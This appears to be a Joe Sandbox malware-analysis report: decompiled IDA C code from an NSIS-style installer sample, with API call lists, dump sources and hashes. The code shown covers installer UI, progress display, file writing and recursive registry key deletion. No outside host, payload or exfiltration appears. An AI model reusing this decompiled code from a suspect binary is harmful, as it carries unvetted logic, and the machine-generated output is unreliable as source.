                                                                                      				long _v8;
                                                                                      				signed char _v12;
                                                                                      				unsigned int _v16;
                                                                                      				void* _v20;
                                                                                      				intOrPtr _v24;
                                                                                      				long _v56;
                                                                                      				void* _v60;
                                                                                      				long _t15;
                                                                                      				unsigned int _t19;
                                                                                      				signed int _t25;
                                                                                      				struct HWND__* _t28;
                                                                                      
                                                                                      				_t28 = _a4;
                                                                                      				_t15 = SendMessageW(_t28, 0x110a, 9, 0);
                                                                                      				if(_a8 == 0) {
                                                                                      					L4:
                                                                                      					_v56 = _t15;
                                                                                      					_v60 = 4;
                                                                                      					SendMessageW(_t28, 0x113e, 0,  &_v60);
                                                                                      					return _v24;
                                                                                      				}
                                                                                      				_t19 = GetMessagePos();
                                                                                      				_v16 = _t19 >> 0x10;
                                                                                      				_v20 = _t19;
                                                                                      				ScreenToClient(_t28,  &_v20);
                                                                                      				_t25 = SendMessageW(_t28, 0x1111, 0,  &_v20);
                                                                                      				if((_v12 & 0x00000066) != 0) {
                                                                                      					_t15 = _v8;
                                                                                      					goto L4;
                                                                                      				}
                                                                                      				return _t25 | 0xffffffff;
                                                                                      			}















                                                                                      APIs
                                                                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404E6F
                                                                                      • GetMessagePos.USER32 ref: 00404E77
                                                                                      • ScreenToClient.USER32(?,?), ref: 00404E91
                                                                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404EA3
                                                                                      • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404EC9
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26208301659.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_xcVh7ZmH4Y.jbxd
                                                                                      Similarity
                                                                                      • API ID: Message$Send$ClientScreen
                                                                                      • String ID: f
                                                                                      • API String ID: 41195575-1993550816
                                                                                      • Opcode ID: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                                                                      • Instruction ID: 177f1d0b32132a6560496663958852c5fe6f1b23f9da62007dee57caca3d7f28
                                                                                      • Opcode Fuzzy Hash: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                                                                      • Instruction Fuzzy Hash: 34014C71900219BADB00DBA4DD85BFFBBB8AB54711F10012BBA50B61C0D7B49A058BA5
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			E00402F93(struct HWND__* _a4, intOrPtr _a8) {
                                                                                      				short _v132;
                                                                                      				int _t11;
                                                                                      				int _t20;
                                                                                      
                                                                                      				if(_a8 == 0x110) {
                                                                                      					SetTimer(_a4, 1, 0xfa, 0);
                                                                                      					_a8 = 0x113;
                                                                                      				}
                                                                                      				if(_a8 == 0x113) {
                                                                                      					_t20 =  *0x41ea18; // 0x4ad42
                                                                                      					_t11 =  *0x42aa24; // 0x4ad46
                                                                                      					if(_t20 >= _t11) {
                                                                                      						_t20 = _t11;
                                                                                      					}
                                                                                      					wsprintfW( &_v132, L"verifying installer: %d%%", MulDiv(_t20, 0x64, _t11));
                                                                                      					SetWindowTextW(_a4,  &_v132);
                                                                                      					SetDlgItemTextW(_a4, 0x406,  &_v132);
                                                                                      				}
                                                                                      				return 0;
                                                                                      			}







                                                                                      APIs
                                                                                      • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FB1
                                                                                      • MulDiv.KERNEL32(0004AD42,00000064,0004AD46), ref: 00402FDC
                                                                                      • wsprintfW.USER32 ref: 00402FEC
                                                                                      • SetWindowTextW.USER32(?,?), ref: 00402FFC
                                                                                      • SetDlgItemTextW.USER32(?,00000406,?), ref: 0040300E
                                                                                      Strings
                                                                                      • verifying installer: %d%%, xrefs: 00402FE6
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26208301659.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.26208278739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208352397.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208378873.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208407009.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208560356.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208581287.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208601155.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208625683.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208645954.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208667319.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208698975.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_xcVh7ZmH4Y.jbxd
                                                                                      Similarity
                                                                                      • API ID: Text$ItemTimerWindowwsprintf
                                                                                      • String ID: verifying installer: %d%%
                                                                                      • API String ID: 1451636040-82062127
                                                                                      • Opcode ID: ea3fb41b8b9d1af7e43715991a6ce4dd060937d78b5a266238e4f5c2501e20f6
                                                                                      • Instruction ID: eb17ebabde20c32bd565f0ca98bf5c3c7f8a04474e671541d9d17dad0456e96b
                                                                                      • Opcode Fuzzy Hash: ea3fb41b8b9d1af7e43715991a6ce4dd060937d78b5a266238e4f5c2501e20f6
                                                                                      • Instruction Fuzzy Hash: 20014B7064020DABEF209F60DE4AFEA3B79FB04345F008039FA06B51D0DBB999559F69
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 75%
                                                                                      			E71032655() {
                                                                                      				intOrPtr _t24;
                                                                                      				void* _t26;
                                                                                      				intOrPtr _t27;
                                                                                      				signed int _t39;
                                                                                      				void* _t40;
                                                                                      				void* _t43;
                                                                                      				intOrPtr _t44;
                                                                                      				void* _t45;
                                                                                      
                                                                                      				_t40 = E710312BB();
                                                                                      				_t24 =  *((intOrPtr*)(_t45 + 0x18));
                                                                                      				_t44 =  *((intOrPtr*)(_t24 + 0x1014));
                                                                                      				_t43 = (_t44 + 0x81 << 5) + _t24;
                                                                                      				do {
                                                                                      					if( *((intOrPtr*)(_t43 - 4)) >= 0) {
                                                                                      					}
                                                                                      					_t39 =  *(_t43 - 8) & 0x000000ff;
                                                                                      					if(_t39 <= 7) {
                                                                                      						switch( *((intOrPtr*)(_t39 * 4 +  &M71032784))) {
                                                                                      							case 0:
                                                                                      								 *_t40 = 0;
                                                                                      								goto L17;
                                                                                      							case 1:
                                                                                      								__eax =  *__eax;
                                                                                      								if(__ecx > __ebx) {
                                                                                      									 *(__esp + 0x10) = __ecx;
                                                                                      									__ecx =  *(0x7103407c + __edx * 4);
                                                                                      									__edx =  *(__esp + 0x10);
                                                                                      									__ecx = __ecx * __edx;
                                                                                      									asm("sbb edx, edx");
                                                                                      									__edx = __edx & __ecx;
                                                                                      									__eax = __eax &  *(0x7103409c + __edx * 4);
                                                                                      								}
                                                                                      								_push(__eax);
                                                                                      								goto L15;
                                                                                      							case 2:
                                                                                      								__eax = E71031510(__edx,  *__eax,  *((intOrPtr*)(__eax + 4)), __edi);
                                                                                      								goto L16;
                                                                                      							case 3:
                                                                                      								__ecx =  *0x7103506c;
                                                                                      								__edx = __ecx - 1;
                                                                                      								__eax = MultiByteToWideChar(__ebx, __ebx,  *__eax, __ecx, __edi, __edx);
                                                                                      								__eax =  *0x7103506c;
                                                                                      								 *((short*)(__edi + __eax * 2 - 2)) = __bx;
                                                                                      								goto L17;
                                                                                      							case 4:
                                                                                      								__eax = lstrcpynW(__edi,  *__eax,  *0x7103506c);
                                                                                      								goto L17;
                                                                                      							case 5:
                                                                                      								_push( *0x7103506c);
                                                                                      								_push(__edi);
                                                                                      								_push( *__eax);
                                                                                      								__imp__StringFromGUID2();
                                                                                      								goto L17;
                                                                                      							case 6:
                                                                                      								_push( *__esi);
                                                                                      								L15:
                                                                                      								__eax = wsprintfW(__edi, 0x71035000);
                                                                                      								L16:
                                                                                      								__esp = __esp + 0xc;
                                                                                      								goto L17;
                                                                                      						}
                                                                                      					}
                                                                                      					L17:
                                                                                      					_t26 =  *(_t43 + 0x14);
                                                                                      					if(_t26 != 0 && ( *((intOrPtr*)( *((intOrPtr*)(_t45 + 0x18)))) != 2 ||  *((intOrPtr*)(_t43 - 4)) > 0)) {
                                                                                      						GlobalFree(_t26);
                                                                                      					}
                                                                                      					_t27 =  *((intOrPtr*)(_t43 + 0xc));
                                                                                      					if(_t27 != 0) {
                                                                                      						if(_t27 != 0xffffffff) {
                                                                                      							if(_t27 > 0) {
                                                                                      								E71031381(_t27 - 1, _t40);
                                                                                      								goto L26;
                                                                                      							}
                                                                                      						} else {
                                                                                      							E71031312(_t40);
                                                                                      							L26:
                                                                                      						}
                                                                                      					}
                                                                                      					_t44 = _t44 - 1;
                                                                                      					_t43 = _t43 - 0x20;
                                                                                      				} while (_t44 >= 0);
                                                                                      				return GlobalFree(_t40);
                                                                                      			}












                                                                                      APIs
                                                                                        • Part of subcall function 710312BB: GlobalAlloc.KERNEL32(00000040,?,710312DB,?,7103137F,00000019,710311CA,-000000A0), ref: 710312C5
                                                                                      • GlobalFree.KERNEL32(?), ref: 71032743
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 71032778
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26231651771.0000000071031000.00000020.00000001.01000000.00000004.sdmp, Offset: 71030000, based on PE: true
                                                                                      • Associated: 00000001.00000002.26231597486.0000000071030000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.26231722184.0000000071034000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.26231774806.0000000071036000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_71030000_xcVh7ZmH4Y.jbxd
                                                                                      Similarity
                                                                                      • API ID: Global$Free$Alloc
                                                                                      • String ID:
                                                                                      • API String ID: 1780285237-0
                                                                                      • Opcode ID: 99fa31c7c7688641df0e257330ce0a53f6b02769069f007b227f0877dfad4bec
                                                                                      • Instruction ID: 0b61ed870113efc574e58948cbe137d27c599a134dd18ab99bb61a8a7792266a
                                                                                      • Opcode Fuzzy Hash: 99fa31c7c7688641df0e257330ce0a53f6b02769069f007b227f0877dfad4bec
                                                                                      • Instruction Fuzzy Hash: 1431B072608102EFC7178F75CD84E2EBBB6FBC9B403A4456DF14287260C73268199B61
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 86%
                                                                                      			E00402950(int __ebx, void* __eflags) {
                                                                                      				WCHAR* _t26;
                                                                                      				void* _t29;
                                                                                      				long _t37;
                                                                                      				int _t49;
                                                                                      				void* _t52;
                                                                                      				void* _t54;
                                                                                      				void* _t56;
                                                                                      				void* _t59;
                                                                                      				void* _t60;
                                                                                      				void* _t61;
                                                                                      
                                                                                      				_t49 = __ebx;
                                                                                      				_t52 = 0xfffffd66;
                                                                                      				_t26 = E00402DA6(0xfffffff0);
                                                                                      				_t55 = _t26;
                                                                                      				 *(_t61 - 0x40) = _t26;
                                                                                      				if(E00405E83(_t26) == 0) {
                                                                                      					E00402DA6(0xffffffed);
                                                                                      				}
                                                                                      				E00406008(_t55);
                                                                                      				_t29 = E0040602D(_t55, 0x40000000, 2);
                                                                                      				 *(_t61 + 8) = _t29;
                                                                                      				if(_t29 != 0xffffffff) {
                                                                                      					 *(_t61 - 0x38) =  *(_t61 - 0x2c);
                                                                                      					if( *(_t61 - 0x28) != _t49) {
                                                                                      						_t37 =  *0x434f14;
                                                                                      						 *(_t61 - 0x44) = _t37;
                                                                                      						_t54 = GlobalAlloc(0x40, _t37);
                                                                                      						if(_t54 != _t49) {
                                                                                      							E004034E5(_t49);
                                                                                      							E004034CF(_t54,  *(_t61 - 0x44));
                                                                                      							_t59 = GlobalAlloc(0x40,  *(_t61 - 0x28));
                                                                                      							 *(_t61 - 0x10) = _t59;
                                                                                      							if(_t59 != _t49) {
                                                                                      								E004032B4( *(_t61 - 0x2c), _t49, _t59,  *(_t61 - 0x28));
                                                                                      								while( *_t59 != _t49) {
                                                                                      									_t60 = _t59 + 8;
                                                                                      									 *(_t61 - 0x3c) =  *_t59;
                                                                                      									E00405FE8( *((intOrPtr*)(_t59 + 4)) + _t54, _t60,  *_t59);
                                                                                      									_t59 = _t60 +  *(_t61 - 0x3c);
                                                                                      								}
                                                                                      								GlobalFree( *(_t61 - 0x10));
                                                                                      							}
                                                                                      							E004060DF( *(_t61 + 8), _t54,  *(_t61 - 0x44));
                                                                                      							GlobalFree(_t54);
                                                                                      							 *(_t61 - 0x38) =  *(_t61 - 0x38) | 0xffffffff;
                                                                                      						}
                                                                                      					}
                                                                                      					_t52 = E004032B4( *(_t61 - 0x38),  *(_t61 + 8), _t49, _t49);
                                                                                      					CloseHandle( *(_t61 + 8));
                                                                                      				}
                                                                                      				_t56 = 0xfffffff3;
                                                                                      				if(_t52 < _t49) {
                                                                                      					_t56 = 0xffffffef;
                                                                                      					DeleteFileW( *(_t61 - 0x40));
                                                                                      					 *((intOrPtr*)(_t61 - 4)) = 1;
                                                                                      				}
                                                                                      				_push(_t56);
                                                                                      				E00401423();
                                                                                      				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t61 - 4));
                                                                                      				return 0;
                                                                                      			}














                                                                                      APIs
                                                                                      • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B1
                                                                                      • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029CD
                                                                                      • GlobalFree.KERNEL32(?), ref: 00402A06
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 00402A19
                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A35
                                                                                      • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A48
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26208301659.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_xcVh7ZmH4Y.jbxd
                                                                                      Similarity
                                                                                      • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                      • String ID:
                                                                                      • API String ID: 2667972263-0
                                                                                      • Opcode ID: 8d79a1ea2f403288575e4ae95cfc9df1235619e51be8e1d19ef317bb75d43f00
                                                                                      • Instruction ID: 8fc1a79e9ee36ebd610a2d663d7387b5f1fea8f48d7bc9e01940cd119f3fb53c
                                                                                      • Opcode Fuzzy Hash: 8d79a1ea2f403288575e4ae95cfc9df1235619e51be8e1d19ef317bb75d43f00
                                                                                      • Instruction Fuzzy Hash: 5831C271D00124BBCF216FA9CE49DDEBE79AF49364F14023AF450762E0CB794C429BA8
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 85%
                                                                                      			E71032480(void* __edx) {
                                                                                      				void* _t37;
                                                                                      				signed int _t38;
                                                                                      				void* _t39;
                                                                                      				void* _t41;
                                                                                      				signed char* _t42;
                                                                                      				signed char* _t51;
                                                                                      				void* _t52;
                                                                                      				void* _t54;
                                                                                      
                                                                                      				 *(_t54 + 0x10) = 0 |  *((intOrPtr*)( *((intOrPtr*)(_t54 + 8)) + 0x1014)) > 0x00000000;
                                                                                      				while(1) {
                                                                                      					_t9 =  *((intOrPtr*)(_t54 + 0x18)) + 0x1018; // 0x1018
                                                                                      					_t51 = ( *(_t54 + 0x10) << 5) + _t9;
                                                                                      					_t52 = _t51[0x18];
                                                                                      					if(_t52 == 0) {
                                                                                      						goto L9;
                                                                                      					}
                                                                                      					_t41 = 0x1a;
                                                                                      					if(_t52 == _t41) {
                                                                                      						goto L9;
                                                                                      					}
                                                                                      					if(_t52 != 0xffffffff) {
                                                                                      						if(_t52 <= 0 || _t52 > 0x19) {
                                                                                      							_t51[0x18] = _t41;
                                                                                      							goto L12;
                                                                                      						} else {
                                                                                      							_t37 = E7103135A(_t52 - 1);
                                                                                      							L10:
                                                                                      							goto L11;
                                                                                      						}
                                                                                      					} else {
                                                                                      						_t37 = E710312E3();
                                                                                      						L11:
                                                                                      						_t52 = _t37;
                                                                                      						L12:
                                                                                      						_t13 =  &(_t51[8]); // 0x1020
                                                                                      						_t42 = _t13;
                                                                                      						if(_t51[4] >= 0) {
                                                                                      						}
                                                                                      						_t38 =  *_t51 & 0x000000ff;
                                                                                      						_t51[0x1c] = 0;
                                                                                      						if(_t38 > 7) {
                                                                                      							L27:
                                                                                      							_t39 = GlobalFree(_t52);
                                                                                      							if( *(_t54 + 0x10) == 0) {
                                                                                      								return _t39;
                                                                                      							}
                                                                                      							if( *(_t54 + 0x10) !=  *((intOrPtr*)( *((intOrPtr*)(_t54 + 0x18)) + 0x1014))) {
                                                                                      								 *(_t54 + 0x10) =  *(_t54 + 0x10) + 1;
                                                                                      							} else {
                                                                                      								 *(_t54 + 0x10) =  *(_t54 + 0x10) & 0x00000000;
                                                                                      							}
                                                                                      							continue;
                                                                                      						} else {
                                                                                      							switch( *((intOrPtr*)(_t38 * 4 +  &M710325F8))) {
                                                                                      								case 0:
                                                                                      									 *_t42 = 0;
                                                                                      									goto L27;
                                                                                      								case 1:
                                                                                      									__eax = E710313B1(__ebp);
                                                                                      									goto L21;
                                                                                      								case 2:
                                                                                      									 *__edi = E710313B1(__ebp);
                                                                                      									__edi[1] = __edx;
                                                                                      									goto L27;
                                                                                      								case 3:
                                                                                      									__eax = GlobalAlloc(0x40,  *0x7103506c);
                                                                                      									 *(__esi + 0x1c) = __eax;
                                                                                      									__edx = 0;
                                                                                      									 *__edi = __eax;
                                                                                      									__eax = WideCharToMultiByte(0, 0, __ebp,  *0x7103506c, __eax,  *0x7103506c, 0, 0);
                                                                                      									goto L27;
                                                                                      								case 4:
                                                                                      									__eax = E710312CC(__ebp);
                                                                                      									 *(__esi + 0x1c) = __eax;
                                                                                      									L21:
                                                                                      									 *__edi = __eax;
                                                                                      									goto L27;
                                                                                      								case 5:
                                                                                      									__eax = GlobalAlloc(0x40, 0x10);
                                                                                      									_push(__eax);
                                                                                      									 *(__esi + 0x1c) = __eax;
                                                                                      									_push(__ebp);
                                                                                      									 *__edi = __eax;
                                                                                      									__imp__CLSIDFromString();
                                                                                      									goto L27;
                                                                                      								case 6:
                                                                                      									if( *__ebp != __cx) {
                                                                                      										__eax = E710313B1(__ebp);
                                                                                      										 *__ebx = __eax;
                                                                                      									}
                                                                                      									goto L27;
                                                                                      								case 7:
                                                                                      									 *(__esi + 0x18) =  *(__esi + 0x18) - 1;
                                                                                      									( *(__esi + 0x18) - 1) *  *0x7103506c =  *0x71035074 + ( *(__esi + 0x18) - 1) *  *0x7103506c * 2 + 0x18;
                                                                                      									 *__ebx =  *0x71035074 + ( *(__esi + 0x18) - 1) *  *0x7103506c * 2 + 0x18;
                                                                                      									asm("cdq");
                                                                                      									__eax = E71031510(__edx,  *0x71035074 + ( *(__esi + 0x18) - 1) *  *0x7103506c * 2 + 0x18, __edx,  *0x71035074 + ( *(__esi + 0x18) - 1) *  *0x7103506c * 2);
                                                                                      									goto L27;
                                                                                      							}
                                                                                      						}
                                                                                      					}
                                                                                      					L9:
                                                                                      					_t37 = E710312CC(0x71035044);
                                                                                      					goto L10;
                                                                                      				}
                                                                                      			}











                                                                                      0x710325b6
                                                                                      0x710325b9
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x71032508
                                                                                      0x71032502
                                                                                      0x710324db
                                                                                      0x710324e0
                                                                                      0x00000000
                                                                                      0x710324e0

                                                                                      APIs
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 710325C2
                                                                                        • Part of subcall function 710312CC: lstrcpynW.KERNEL32(00000000,?,7103137F,00000019,710311CA,-000000A0), ref: 710312DC
                                                                                      • GlobalAlloc.KERNEL32(00000040), ref: 71032548
                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 71032563
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26231651771.0000000071031000.00000020.00000001.01000000.00000004.sdmp, Offset: 71030000, based on PE: true
                                                                                      • Associated: 00000001.00000002.26231597486.0000000071030000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.26231722184.0000000071034000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.26231774806.0000000071036000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_71030000_xcVh7ZmH4Y.jbxd
                                                                                      Similarity
                                                                                      • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                                                      • String ID:
                                                                                      • API String ID: 4216380887-0
                                                                                      • Opcode ID: 77a6cdaf2088a988187e99ed3687d04958aac5eb573d8bf5f81d8f60c987eef7
                                                                                      • Instruction ID: 206eabf3991237e9f1c1e1eb233266712b809df4857cb02b79f98b67698fc77f
                                                                                      • Opcode Fuzzy Hash: 77a6cdaf2088a988187e99ed3687d04958aac5eb573d8bf5f81d8f60c987eef7
                                                                                      • Instruction Fuzzy Hash: F641BFB1108306EFD715DF35D844A2ABBF9FBC8B10F90895DF54786581EB31A648CBA1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 48%
                                                                                      			E00402EA9(void* __eflags, void* _a4, short* _a8, signed int _a12) {
                                                                                      				void* _v8;
                                                                                      				int _v12;
                                                                                      				short _v536;
                                                                                      				void* _t27;
                                                                                      				signed int _t33;
                                                                                      				intOrPtr* _t35;
                                                                                      				signed int _t45;
                                                                                      				signed int _t46;
                                                                                      				signed int _t47;
                                                                                      
                                                                                      				_t46 = _a12;
                                                                                      				_t47 = _t46 & 0x00000300;
                                                                                      				_t45 = _t46 & 0x00000001;
                                                                                      				_t27 = E004063AA(__eflags, _a4, _a8, _t47 | 0x00000009,  &_v8);
                                                                                      				if(_t27 == 0) {
                                                                                      					if((_a12 & 0x00000002) == 0) {
                                                                                      						L3:
                                                                                      						_push(0x105);
                                                                                      						_push( &_v536);
                                                                                      						_push(0);
                                                                                      						while(RegEnumKeyW(_v8, ??, ??, ??) == 0) {
                                                                                      							__eflags = _t45;
                                                                                      							if(__eflags != 0) {
                                                                                      								L10:
                                                                                      								RegCloseKey(_v8);
                                                                                      								return 0x3eb;
                                                                                      							}
                                                                                      							_t33 = E00402EA9(__eflags, _v8,  &_v536, _a12);
                                                                                      							__eflags = _t33;
                                                                                      							if(_t33 != 0) {
                                                                                      								break;
                                                                                      							}
                                                                                      							_push(0x105);
                                                                                      							_push( &_v536);
                                                                                      							_push(_t45);
                                                                                      						}
                                                                                      						RegCloseKey(_v8);
                                                                                      						_t35 = E0040690A(3);
                                                                                      						if(_t35 != 0) {
                                                                                      							return  *_t35(_a4, _a8, _t47, 0);
                                                                                      						}
                                                                                      						return RegDeleteKeyW(_a4, _a8);
                                                                                      					}
                                                                                      					_v12 = 0;
                                                                                      					if(RegEnumValueW(_v8, 0,  &_v536,  &_v12, 0, 0, 0, 0) != 0x103) {
                                                                                      						goto L10;
                                                                                      					}
                                                                                      					goto L3;
                                                                                      				}
                                                                                      				return _t27;
                                                                                      			}













                                                                                      APIs
                                                                                      • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402EFD
                                                                                      • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F49
                                                                                      • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F52
                                                                                      • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F69
                                                                                      • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F74
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26208301659.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.26208278739.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208352397.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208378873.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208407009.000000000040D000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208560356.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208581287.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208601155.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208625683.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208645954.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208667319.0000000000442000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208698975.0000000000464000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_xcVh7ZmH4Y.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseEnum$DeleteValue
                                                                                      • String ID:
                                                                                      • API String ID: 1354259210-0
                                                                                      • Opcode ID: 78d35a7524f1d2205fa0e87ab22fa6bfb41dfe8b1a27fd9ec563711b6eb4cb1f
                                                                                      • Instruction ID: ca6229ec891c5908b4c2d3bab14ae3db7b9396451d72a40731f1c02386a45f13
                                                                                      • Opcode Fuzzy Hash: 78d35a7524f1d2205fa0e87ab22fa6bfb41dfe8b1a27fd9ec563711b6eb4cb1f
                                                                                      • Instruction Fuzzy Hash: DA215A7150010ABBEF119F90CE89EEF7B7DEB50384F100076F909B21A0D7B49E54AA68
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 77%
                                                                                      			E00401D81(void* __ebx, void* __edx) {
                                                                                      				struct HWND__* _t30;
                                                                                      				WCHAR* _t38;
                                                                                      				void* _t48;
                                                                                      				void* _t53;
                                                                                      				signed int _t55;
                                                                                      				signed int _t60;
                                                                                      				long _t63;
                                                                                      				void* _t65;
                                                                                      
                                                                                      				_t53 = __ebx;
                                                                                      				if(( *(_t65 - 0x23) & 0x00000001) == 0) {
                                                                                      					_t30 = GetDlgItem( *(_t65 - 8),  *(_t65 - 0x28));
                                                                                      				} else {
                                                                                      					E00402D84(2);
                                                                                      					 *((intOrPtr*)(__ebp - 0x10)) = __edx;
                                                                                      				}
                                                                                      				_t55 =  *(_t65 - 0x24);
                                                                                      				 *(_t65 + 8) = _t30;
                                                                                      				_t60 = _t55 & 0x00000004;
                                                                                      				 *(_t65 - 0x38) = _t55 & 0x00000003;
                                                                                      				 *(_t65 - 0x18) = _t55 >> 0x1f;
                                                                                      				 *(_t65 - 0x40) = _t55 >> 0x0000001e & 0x00000001;
                                                                                      				if((_t55 & 0x00010000) == 0) {
                                                                                      					_t38 =  *(_t65 - 0x2c) & 0x0000ffff;
                                                                                      				} else {
                                                                                      					_t38 = E00402DA6(0x11);
                                                                                      				}
                                                                                      				 *(_t65 - 0x44) = _t38;
                                                                                      				GetClientRect( *(_t65 + 8), _t65 - 0x60);
                                                                                      				asm("sbb esi, esi");
                                                                                      				_t63 = LoadImageW( ~_t60 &  *0x434f00,  *(_t65 - 0x44),  *(_t65 - 0x38),  *(_t65 - 0x58) *  *(_t65 - 0x18),  *(_t65 - 0x54) *  *(_t65 - 0x40),  *(_t65 - 0x24) & 0x0000fef0);
                                                                                      				_t48 = SendMessageW( *(_t65 + 8), 0x172,  *(_t65 - 0x38), _t63);
                                                                                      				if(_t48 != _t53 &&  *(_t65 - 0x38) == _t53) {
                                                                                      					DeleteObject(_t48);
                                                                                      				}
                                                                                      				if( *((intOrPtr*)(_t65 - 0x30)) >= _t53) {
                                                                                      					_push(_t63);
                                                                                      					E00406484();
                                                                                      				}
                                                                                      				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t65 - 4));
                                                                                      				return 0;
                                                                                      			}












                                                                                      APIs
                                                                                      • GetDlgItem.USER32(?,?), ref: 00401D9A
                                                                                      • GetClientRect.USER32(?,?), ref: 00401DE5
                                                                                      • LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E15
                                                                                      • SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E29
                                                                                      • DeleteObject.GDI32(00000000), ref: 00401E39
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26208301659.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.26208278739.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208352397.0000000000408000.00000002.00000001.01000000.00000003.sdmp
